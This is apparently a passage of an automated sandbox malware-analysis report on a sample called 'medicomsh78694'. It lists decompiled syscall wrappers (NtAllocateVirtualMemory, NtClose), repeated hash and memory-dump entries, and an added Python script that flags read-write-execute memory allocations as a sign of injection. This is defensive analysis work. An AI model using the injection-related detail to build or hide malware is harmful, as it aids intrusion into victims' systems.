• Node 310: 4187ec-41880d (NtAllocateVirtualMemory)
• Node 311: 4187e7 (call 4191f0)
• Edges: 309->310, 309->311, 311->310
                                                                            C-Code - Quality: 100%
                                                                            			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                            				long _t14;
                                                                            				void* _t21;
                                                                            
                                                                            				_t3 = _a4 + 0xc60; // 0xca0
                                                                            				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                            				return _t14;
                                                                            			}

Instruction addresses: 0x004187df, 0x004187e7, 0x00418809, 0x0041880d

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E0041871A(void* __eax, void* _a4) {
                                                                            				intOrPtr _v0;
                                                                            				long _t12;
                                                                            				void* _t15;
                                                                            				intOrPtr _t9;  /* decompiler temporaries, left undeclared in the raw output */
                                                                            				intOrPtr _t4;
                                                                            				intOrPtr _t5;
                                                                            
                                                                            				asm("std");  /* stray byte ahead of the real prologue: this listing overlaps E00418720 below from 0x00418723 onward */
                                                                            				_t9 = _v0;
                                                                            				_t4 = _t9 + 0x10; // 0x300
                                                                            				_t5 = _t9 + 0xc50; // 0x409773
                                                                            				/* helper at 0x004191F0 (not resolved by the decompiler) receives two fields of the block at _v0 plus the constant 0x2c */
                                                                            				E004191F0(_t15, _v0, _t5,  *_t4, 0, 0x2c);
                                                                            				_t12 = NtClose(_a4); // executed
                                                                            				return _t12;
                                                                            			}

                                                                            Instruction addresses (listing text not captured): 0x0041871b 0x00418723 0x00418726 0x0041872f 0x00418737 0x00418745 0x00418749

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 0a030cf58b278bf01a37fba5adb696adc19655469465a61ba12c442a1649db8c
                                                                            • Instruction ID: e7c7b26b56aa3ef3894ac92963c2d3afbe7f2f49a178fa1cdb0e7ac7142d9514
                                                                            • Opcode Fuzzy Hash: 0a030cf58b278bf01a37fba5adb696adc19655469465a61ba12c442a1649db8c
                                                                            • Instruction Fuzzy Hash: 52E08C75200204ABDA20EF988C88ED7372AEF44250F004049B958AF242C230FA0087A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418720(intOrPtr _a4, void* _a8) {
                                                                            				long _t8;
                                                                            				void* _t11;
                                                                            				intOrPtr _t5;  /* decompiler temporaries, left undeclared in the raw output */
                                                                            				intOrPtr _t2;
                                                                            				intOrPtr _t3;
                                                                            
                                                                            				_t5 = _a4;
                                                                            				_t2 = _t5 + 0x10; // 0x300
                                                                            				_t3 = _t5 + 0xc50; // 0x409773
                                                                            				/* same helper call as E0041871A above, with the context block taken from the first argument */
                                                                            				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                            				_t8 = NtClose(_a8); // executed
                                                                            				return _t8;
                                                                            			}

                                                                            Instruction addresses (listing text not captured): 0x00418723 0x00418726 0x0041872f 0x00418737 0x00418745 0x00418749

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
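The API records in this section (NtAllocateVirtualMemory at ref 00418809, NtClose at ref 00418745) are printed in Joe Sandbox's `API.DLL(slot,slot,...), ref: caller` form, where each slot is an 8-digit hex value or `?` for a value the sandbox did not resolve. The Python below is an added example, not part of the report: it parses that form and applies one triage rule, flagging any allocation call whose recorded slots contain both MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40), the RWX pattern the signatures in this report attribute to the injection stage. Assumption: the slot list is a raw stack dump that can hold more than the call's formal parameters (the record above has 13 slots for a 6-parameter NTAPI call), so the rule matches the constants anywhere in the list rather than by position. The first three sample lines are copied from this section; the VirtualAlloc line is constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Documented Win32 constants (not assumptions).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

# Joe Sandbox API record: "<API>.<DLL>(<slot>,<slot>,...), ref: <caller address>".
# Each slot is an 8-digit hex value or "?" for a value the sandbox did not resolve.
_CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# APIs whose argument list carries an allocation type and a page protection.
ALLOC_APIS = {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx"}


@dataclass
class ApiCall:
    api: str
    dll: str
    args: List[Optional[int]]  # None stands for a "?" slot
    ref: int


def parse_call(line: str) -> Optional[ApiCall]:
    """Parse one API record line; return None for lines that are not records."""
    m = _CALL_RE.match(line)
    if m is None:
        return None
    args: List[Optional[int]] = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok == "":
            continue
        args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("dll"), args, int(m.group("ref"), 16))


def flags_rwx_allocation(call: ApiCall) -> bool:
    """Heuristic: an allocation API whose recorded slots contain both
    MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE. Slots are matched
    anywhere in the list (assumption: the list is a stack dump, so the
    Protect value is not guaranteed to sit at parameter position 6)."""
    if call.api not in ALLOC_APIS:
        return False
    known = {a for a in call.args if a is not None}
    return (MEM_COMMIT | MEM_RESERVE) in known and PAGE_EXECUTE_READWRITE in known


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (caller address, API) for every record the rule flags."""
    hits: List[Tuple[int, str]] = []
    for line in lines:
        call = parse_call(line)
        if call is not None and flags_rwx_allocation(call):
            hits.append((call.ref, call.api))
    return hits


# Sample input: the first three lines are the records shown in this section;
# the VirtualAlloc line is constructed (PAGE_READWRITE = 0x04, must not be flagged).
REPORT_LINES = [
    "• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809",
    "• NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745",
    "• NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745",
    "• VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00401000",
]

if __name__ == "__main__":
    for ref, api in triage(REPORT_LINES):
        print(f"RWX allocation via {api} at caller {ref:08X}")
```

The rule is deliberately loose because of the stack-dump layout; on a full report it should be read as a triage pointer to the caller address (here 00418809, one of the wrappers listed in this section), not as a verdict on its own.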

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                            • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                            • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                            • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                            • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                            • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                            • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                            • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                            • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                            • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
